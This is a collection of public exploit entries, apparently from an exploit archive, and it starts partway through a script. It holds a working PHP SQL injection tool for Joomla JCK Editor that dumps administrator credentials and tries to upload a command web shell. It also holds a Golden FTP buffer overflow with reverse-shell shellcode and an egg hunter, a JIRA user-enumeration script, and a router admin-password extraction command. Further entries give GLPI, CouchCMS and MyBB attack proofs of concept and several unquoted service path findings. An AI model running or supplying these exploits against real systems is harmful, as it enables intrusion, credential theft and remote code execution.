attacker_ip, attacker_port) trigger_shell(target_ip, revshell_file_name) print("\n(+) done!") if __name__ == "__main__": main()

# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2) # Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/ # Date: 05/03/2021 # Exploit Author: Nicholas Ferreira # Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor # Version: 6.4.4 # Tested on: Debian 10 # CVE : CVE-2018-17254 # PHP version (exploit): 7.3.27 # POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa <?php $vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php'; function payload($str1, $str2=""){ return '?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #" } function get_request($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); #curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); $output = curl_exec($ch); curl_close($ch); return $output; } function parse_columns($columns){ $parsed_columns = array(); foreach($columns as $col){ array_push($parsed_columns, $col); array_push($parsed_columns, "0x242324"); //delimiter = $#$ } return $parsed_columns; } function inject($url, $payload){ global $vuln_file; $request = get_request($url.$vuln_file.$payload); preg_match_all('/url ="(.*)">/', $request, $output); return $output; } ###### function is_vulnerable($url){ global $vuln_file; $output = inject($url, payload("0x6861636b6564")); if(isset($output[1][0])){ if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject return 1; } } return 0; } function get_db_names($url){ global $vuln_file; $db_names = array(); $output = inject($url, payload("schema_name", "%20from%20information_schema.schemata")); foreach($output[1] as $db){ array_push($db_names, $db); } return $db_names; } function get_table_names($url, $db){ global $vuln_file; $table_names = array(); $output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27")); foreach($output as $table){ array_push($table_names, $table); } return $table_names; } function get_column_names($url, $table){ global $vuln_file; $column_names = array(); $output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27")); foreach($output as $column){ array_push($column_names, $column); } return $column_names; } function dump_columns($url, $columns, $dbname, $table){ global $vuln_file; $column_dump = array(); $related_arr = array(); $data = array(); $output = inject($url, payload("concat(".implode(',', parse_columns($columns)).")", "%20from%20".$dbname.".".$table)); foreach($output[1] as $column){ $exploded = explode("$#$", $column); array_push($data, $exploded); } foreach($data as $user_info){ array_pop($user_info); array_push($related_arr, array_combine($columns, $user_info)); } return $related_arr; } function rce($url){ //probably won't work =( global $vuln_file; if(!is_vulnerable($url)){ die(red("[-] Target isn't vulnerable.")); } $server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/"); $rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2"; $payl0ad = "'<?php system(\$_GET[0]); ?> ".$rand_content."'"; $filename = rand(1000, 7359).".php"; echo cyan("[i]")." Trying to upload a RCE shell...\n"; foreach($server_root as $path){ inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'")); } $get_shell = get_request($url."/".$filename); if(strpos($get_shell, $rand_content) !== false){ echo green("[+] RCE shell successfully uploaded! =)\n"); die("Usage: ".$url."/".$filename."?0=whoami\n"); }else{ echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n"); die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n"); } } function read_file($url, $file){ global $vuln_file; } ############ function green($str){ return "\e[92m".$str."\e[0m"; } function red($str){ return "\e[91m".$str."\e[0m"; } function yellow($str){ return "\e[93m".$str."\e[0m"; } function cyan($str){ return "\e[96m".$str."\e[0m"; } function banner(){ echo " ___ _____ _ __ _____ |_ |/ __ \| | / /| _ \ | || / \/| |/ / | | | | _ _ _ __ ___ _ __ ___ _ _ | || | | \ | | | || | | || '_ ` _ \ | '_ \ / _ \| '__| /\__/ /| \__/\| |\ \| |/ / | |_| || | | | | || |_) || __/| | \____/ \____/\_| \_/|___/ \__,_||_| |_| |_|| .__/ \___||_| ".green("Coder: ").yellow("Nicholas Ferreira")." | | |_| "; } $target = 0; $rce = 0; function check(){ global $argv; global $argc; global $target; global $rce; global $target_list; global $save_output; global $verbose; global $less; global $specified_db; $short_args = "u:t:v::h::l::r::d::"; $long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::"); $options = getopt($short_args, $long_args); if(isset($options['h']) || $argc == 1 || isset($options['help'])){ echo "JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254) Usage: php ".$argv[0]." -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db] -u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/) -h, --help: Help -v, --verbose: Verbose mode (print tables) -l, --less: Less outputs (only Administrator usernames and passwords) -t, --targets: Load a list of targets -r, --rce: Try to upload a RCE shell -d, --db: Specifies the DB to dump "; } if(isset($options['u'])){ $target = $options['u']; }elseif(isset($options['url'])){ $target = $options['url']; }else{ $target = ""; } isset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0; isset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0; isset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0; isset($options['f']) ? $target_list = $options['f'] : $target_list = 0; if(isset($options['t'])){ $target_list = $options['t']; }elseif(isset($options['targets'])){ $target_list = $options['targets']; }else{ $target_list = 0; } if(isset($options['d'])){ $specified_db = $options['d']; }elseif(isset($options['db'])){ $specified_db = $options['db']; }else{ $specified_db = 0; } if(strlen($target_list) < 2){ if($target !== ""){ // check if URL is ok if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){ die(red("[i] The target must be a URL.\n")); } if(strpos($target, "plugins") == false){ die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n")); } }else{ die(cyan("[-] ")."You can get help with -h.\n"); } } if($target_list !== 0){ //check if target list is readable if(!file_exists($target_list)){ die(red("[-] ")."Could not read target list file.\n"); } } } function exploit($url){ // returns users and passwords global $vuln_file; global $verbose; global $rce; global $specified_db; global $less; echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n"); echo cyan("[+] ")."Checking if target is vulnerable...\n"; if (is_vulnerable($url)){ $main_db = inject($url, payload("database()"))[1]; $user_table = ""; $hostname = inject($url, payload("@@hostname"))[1]; $mysql_user = inject($url, payload("user()"))[1]; $mysql_version = inject($url, payload("@@version"))[1]; $connection_id = inject($url, payload("connection_id()"))[1]; echo green("[+] Target is vulnerable! =)\n\n"); echo cyan("[i] ")."Hostname: ".yellow($hostname[0])."\n"; echo cyan("[i] ")."Current database: ".yellow($main_db[0])."\n"; echo cyan("[i] ")."MySQL version: ".yellow($mysql_version[0])."\n"; echo cyan("[i] ")."MySQL user: ".yellow($mysql_user[0])."\n"; echo cyan("[i] ")."Connection ID: ".yellow($connection_id[0])."\n\n"; if($rce){ rce($url); } echo cyan("[+] ")."Getting DB names...\n"; $dbs = get_db_names($url); if(count($dbs) == 0){ echo("[-] There are no DBs available on this target. =(\n"); } $db_list = array(); foreach($dbs as $db){ $num_table = count(get_table_names($url, $db)[1]); echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n"; array_push($db_list, $db); } if($main_db == "" && !$specified_db){ echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n")); } if($specified_db !== 0){ // if user doesn't specify a custom db echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n"; $tables = get_table_names($url, $specified_db); }else{ foreach($db_list as $new_db){ if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n"; $tables = get_table_names($url, $new_db); } } } echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n"; if(count($tables[1]) == 0){ echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n")); } foreach($tables[1] as $table){ if($verbose) echo $table."\n"; if(strpos($table, "_users") !== false){ $user_table = $table; } } if($user_table == ""){ echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n")); } echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n"; $columns = get_column_names($url, $user_table); if(count($columns) == 0){ echo(red("[-] There are no columns on this table... =(\n")); } if($verbose){ echo cyan("[+] ")."Columns found:\n"; foreach($columns[1] as $coll){ echo $coll."\n"; } } echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n"; $dump = dump_columns($url, array("id","usertype", "name","username","password","email","lastvisitDate"), $db, $user_table); if(is_array($dump) && count($dump) == 0){ $new_dump = dump_columns($url, array("id","name","username","password","email","lastvisitDate"), $db, $user_table); if(count($new_dump) == 0){ echo(red("[-] This table is empty! =(\n")); }else{ $dump = $new_dump; $usertype = 0; } }else{ $usertype = 1; } echo cyan("\n[+] ")."Retrieved data:\n"; foreach($dump as $user){ if($usertype){ $adm = strpos($user['usertype'], 'Administrator') !== false; }else{ $adm = false; } if($less){ if(strpos($user['usertype'], "Administrator") !== false){ echo "\n=============== ".green($user['username'])." ===============\n"; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == "username" || $key == "password" || $adm){ echo($key.": ".red($data)."\n"); }else{ echo($key.": ".$data."\n"); } } } } }else{ echo "\n=============== ".green($user['username'])." ===============\n"; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == "username" || $key == "password" || $adm){ echo($key.": ".red($data)."\n"); }else{ echo($key.": ".$data."\n"); } } } } } echo(green("\nExploit completed! =)\n\n\n")); }else{ echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n")); echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n"); } } banner(); check(); if(strlen($target_list) >1){ $targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline foreach($targets as $website){ if($rce){ rce($target); }else{ if(strlen($website) > 1){ exploit($website); //multiple targets } } } }else{ exploit($target); //single target } ?>

# Exploit Title: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 07-03-2021 # Vendor Homepage: https://pingzapper.com # Software Links: https://pingzapper.com/download # Tested Version: 2.3.1 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 8.1 Pro 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Pingzapper Service PingzapperSvc C:\Program Files (x86)\Pingzapper\PZService.exe Auto C:\>sc qc PingzapperSvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: PingzapperSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Pingzapper\PZService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Pingzapper Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: GLPI 9.5.3 - 'fromtype' Unsafe Reflection # Date: 2021-02-13 # Exploit Author: Vadym Soroka @Iterasec https://iterasec.com # Vendor Homepage: https://glpi-project.org # Software Link: https://github.com/glpi-project/glpi/releases # Version: <=9.5.3 # Tested on:v9.5.3, 2021-02-13 # Technical advisories: # https://github.com/glpi-project/glpi/security/advisories/GHSA-qmw7-w2m4-rjwp # https://iterasec.com/cve-2021-21327-unsafe-reflection-in-getitemforitemtype-in-glpi/ Impact: Non-authenticated user can remotely instantiate object of any class existing in the GLPI environment that can be used to carry out malicious attacks, or to start a “POP chain”. As an example of direct impact, this vulnerability affects integrity of the GLPI core platform and third-party plugins runtime misusing classes which implement some sensitive operations in their constructors or destructors. Description: When passing an existing class (ex: "Glpi\Console\Application" class) as an input of the getItemForItemtype() function new object of this class is created executing its constructor e.g. magic __construct() PHP method if declared. When a PHP object gets destroyed, its __destruct() method is executed. There are many entry points in the GLPI and its plugins, where untrusted user input is passed to the getItemForItemtype() function missing proper input and authorization checks, so just one example is shown to demonstrate the issue in the dropdownConnect.php as an entry point. Vulnerable code sample: --- file dropdownConnect.php: if (!isset($_POST['fromtype']) || !($fromitem = getItemForItemtype($_POST['fromtype']))) { exit(); } --- --- file dbutils.class.php, function getItemForItemtype($itemtype) if (class_exists($itemtype)) { return new $itemtype(); } //handle namespaces if (substr($itemtype, 0, \strlen(NS_GLPI)) === NS_GLPI) { $itemtype = stripslashes($itemtype); if (class_exists($itemtype)) { return new $itemtype(); } } --- POC/Steps to reproduce: Issue a request*: POST /ajax/dropdownConnect.php HTTP/1.1 Host: glpi Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close Content-Length: 12 fromtype=XXX * replacing XXX with a class name existing in the deployed GLPI environment with expected patterns, e.g.: GLPI Core: "Glpi\Foo\Bar" GLPI Plugins: "PluginFooBar"

# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2) # Author: 1F98D # Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) # Tested on Windows 10 (x64) # # A buffer overflow exists in GoldenFTP during the authentication process. # Note that the source ip address of the user performing the authentication # forms part of the buffer and as such must be accounted for when calculating # the appropriate offset. It should also be noted that the exploit is # rather unstable and if exploitation fails, GoldenFTP will be left in # a state where it will still accept connections, but it will be unable # to handle or process them in anyway, so be careful. # #!/usr/local/bin/python3 from socket import * import sys # Your address forms part of the buffer length calculation SOURCE = '192.168.1.1' TARGET = '192.168.1.2' s = socket(AF_INET, SOCK_STREAM) s.connect((TARGET, 21)) # msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444 buf = b"" buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29" buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48" buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71" buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a" buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38" buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf" buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7" buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a" buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9" buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b" buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a" buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe" buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc" buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5" buf += b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83" buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63" buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16" buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4" buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde" buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3" buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e" buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06" buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc" buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96" buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1" buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e" buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6" total_length = 545-len(SOURCE) eip = b'\x7f\x79\x4c\x00' hunter = b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset base on source ip hunter += b'\xfd' # std ; set df flag so we search high to low hunter += b'\xb8\x43\x42\x41\x40' # mov eax, 0x40414243 ; egg hunter += b'\x89\xF7' # mov edi, esi ; start searching from esi hunter += b'\x47' # inc edi hunter += b'\x90' # nop hunter += b'\x83\xC7\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1 hunter += b'\xaf' # scasd ; check for egg at edi hunter += b'\x75\xfa' # short jnz -0x6 ; jump back to add edi, 0x3 hunter += b'\x83\xC7\x03' # add edi, 0x3 hunter += b'\xaf' # scasd hunter += b'\x75\xfa' # short jnz -0x6 hunter += b'\x83\xC7\x1f' # add edi, 0x1f ; account for egg hunter hunter += b'\xff\xe7' # jmp edi ; egg found, let's go! hunter += b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset again payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip s.send(b'USER anonymous\r\n') print(s.recv(1024)) print(s.recv(1024)) s.send(b'PASS ' + payload + b'\r\n') print(s.recv(1024)) s.send(b'QUIT\r\n') print(s.recv(1024))

# Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path # Date: 2021-1-20 # Exploit Author: Mohammed Alshehri # Vendor Homepage: www.freelan.org # Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe # Version: Version 2.2 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc "FreeLAN Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FreeLAN Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\FreeLAN\bin\freelan.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FreeLAN Service DEPENDENCIES : tap0901 : Dhcp SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path # Date: 2021-1-20 # Exploit Author: Mohammed Alshehri # Vendor Homepage: sandboxie-plus.com # Software Link: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.2/Sandboxie-Plus-x64-v0.7.2.exe # Version: Version 0.7.2 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc SbieSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SbieSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Sandboxie-Plus\SbieSvc.exe LOAD_ORDER_GROUP : UIGroup TAG : 0 DISPLAY_NAME : Sandboxie Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Title: Atlassian JIRA 8.11.1 - User Enumeration # Author: Dolev Farhi # Vulnerable versions: version < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0 # CVE: CVE-2020-14181 # Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies. import sys import os import requests def help(): print('python3 script.py <target> <usernames_file>') print('e.g. python3 script.py https://jiratarget.com usernames.txt') sys.exit() if len(sys.argv) < 3: help() server = sys.argv[1] usernames = sys.argv[2] random_user = '0x00001' try: os.path.exists(usernames) except: print(usernames, 'file does not exist.') sys.exit(1) def test_vulnerable(): resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) if 'User does not exist: {}'.format(random_user) in resp.text: return True return False if test_vulnerable is False: print('server is not vulnerable.') sys.exit(1) f = open(usernames, 'r').read() for username in f.splitlines(): resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username)) if 'User does not exist' not in resp.text: print('EXISTS', username)

# Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path # Date: 2021-1-19 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://carolcoral.github.io/no-free_vpn/ # Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe # Version: Version 2.5.1 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc "waselvpnserv" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: waselvpnserv TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : waselvpnserv DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation # Date: 01.03.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.nucom.es Vendor: NUEVAS COMUNICACIONES IBERIA, S.A. Product web page: https://www.nucom.es Affected version: 5.07.90_multi_NCM01 5.07.89_multi_NCM01 5.07.72_multi_NCM01 Summary: The NC routers upgrades your network to the next generation of WiFi. With combined wireless speeds of up to 1750 Mbps, the device provides better speeds and wireless range. Includes 2 FXS ports for any VoIP service. If you prefer a wired connection, the NC routers have gigabit ports to provide an incredibly fast, lag-free experience. 3.0 ports allow you to power a robust home Internet network by sharing printers, flash storage, FTP servers, or media players. Desc: The application suffers from a privilege escalation vulnerability. The non-privileged default user (user:user) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint and disclose the http super password (admin credentials) in Base64 encoded value. Once authenticated as admin, an attacker will be granted access to the additional and privileged pages. Tested on: GoAhead-Webs Tenda Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5629 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php 01.03.2021 -- lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \ > curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \ > -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \ > grep -oP '(?<=http_supper_passwd=).*' | \ > base64 -d 2>/dev/null | \ > xargs echo -n ; \ > echo -e '\n-----------\n' The admin password is: MammaMia123 ----------- lqwrm@metalgear:~/prive$

# Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload # Date: 2021-01-25 # Exploit Author: xxcdd # Vendor Homepage: https://github.com/CouchCMS/CouchCMS # Software Link: https://github.com/CouchCMS/CouchCMS # Version: v2.2.1 # Tested on: Windows 7 An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload. upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en <http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en> xss.svg content: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg>

# Exploit Title: MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting # Date: 1/30/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://community.mybb.com/mods.php?action=view&pid=1220 # Version: 1.8.22 # Tested on: Windows 10 # CVE: CVE-2021-28115 1. Description: This plugin adds a feedback system to your forum. Edit feedback button is vulnerable to XSS. 2. Proof of Concept: - Go to a user profile - Add feedback and leave the following payload as comment "><script>alert(1)</script> - View the feedback feedback.php?uid=2 - When clicking Edit payload will execute